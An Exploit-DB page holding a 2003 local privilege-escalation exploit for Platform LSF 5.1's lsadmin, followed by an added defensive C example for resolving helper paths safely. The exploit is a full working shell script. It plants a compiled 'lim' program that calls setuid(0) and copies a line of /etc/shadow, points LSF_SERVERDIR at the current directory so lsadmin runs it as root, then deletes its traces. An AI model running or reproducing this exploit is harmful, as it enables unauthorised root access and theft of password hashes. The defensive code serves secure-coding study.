Exploit Platform Load Sharing Facility 4/5 - 'LSF_ENVDIR' Local Command Execution

Exploiter

18 Dec 2022
EDB-ID: 22628
EDB verification: Passed
Author: TOMASZ GRABOWSKI
Vulnerability type: LOCAL
Platform: MULTIPLE
CVE: N/A
Publication date: 2003-03-20
Code:
source: https://www.securityfocus.com/bid/7655/info

It has been reported that Load Sharing Facility (LSF) does not properly handle input in environment variables. Because of this, an attacker may be able to gain escalated privileges on a vulnerable system. 

# LSF 5.1 'lsadmin' local root exploit
# 2003.03.20 - CADENCE of Lam3rZ

# Proof of concept - for educational purposes only!

cat <<__END__> attacker_code.c
#include <stdio.h>
int main() {
FILE *secret_file;
FILE *temp_file;
char one_line[128];
setuid(0);setgid(0);
secret_file = fopen("/etc/shadow", "r");
temp_file = fopen(".temp.file", "w");
fgets(one_line, 120, secret_file);
fputs(one_line, temp_file);
fclose(secret_file); fclose (temp_file);
}
__END__

gcc attacker_code.c -o lim
chmod 777 lim
export LSF_SERVERDIR=.
lsadmin ckconfig
cat .temp.file
rm -f attacker_code.c lim .temp.file
 
Source: www.exploit-db.com
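
The proof of concept above relies on lsadmin taking the location of its `lim` helper from the caller's LSF_SERVERDIR. As an added defensive example (not code from the original post, its author, or the LSF vendor), the C code below shows how a privileged tool can resolve a helper path without trusting the environment. The install path `/opt/lsf/etc` and all function names are assumptions made for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical compiled-in install path; not taken from the page. */
static const char DEFAULT_SERVERDIR[] = "/opt/lsf/etc";

/* Nonzero when the process runs setuid/setgid (real and effective IDs differ). */
int running_privileged(void) {
    return getuid() != geteuid() || getgid() != getegid();
}

/* Trust a directory only if it is absolute, root-owned,
   and not writable by group or others. */
int dir_is_trusted(const char *dir) {
    struct stat st;
    if (dir == NULL || dir[0] != '/') return 0;            /* rejects "." */
    if (stat(dir, &st) != 0 || !S_ISDIR(st.st_mode)) return 0;
    if (st.st_uid != 0) return 0;
    return (st.st_mode & (S_IWGRP | S_IWOTH)) == 0;
}

/* Choose the directory the helper may be executed from. */
const char *choose_serverdir(const char *env_value, int privileged) {
    if (privileged) return DEFAULT_SERVERDIR;   /* ignore the environment */
    if (dir_is_trusted(env_value)) return env_value;
    return DEFAULT_SERVERDIR;
}

/* Build "<dir>/lim"; returns 0 on success, -1 if the buffer is too small. */
int build_helper_path(char *out, size_t outlen,
                      const char *env_value, int privileged) {
    int n = snprintf(out, outlen, "%s/lim",
                     choose_serverdir(env_value, privileged));
    return (n > 0 && (size_t)n < outlen) ? 0 : -1;
}

int main(void) {
    char path[4096];
    if (build_helper_path(path, sizeof path, getenv("LSF_SERVERDIR"),
                          running_privileged()) != 0)
        return 1;
    printf("helper path: %s\n", path);
    return 0;
}
```

The ownership check covers only the final directory, so the parent directories of the install path must also be writable by root alone.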
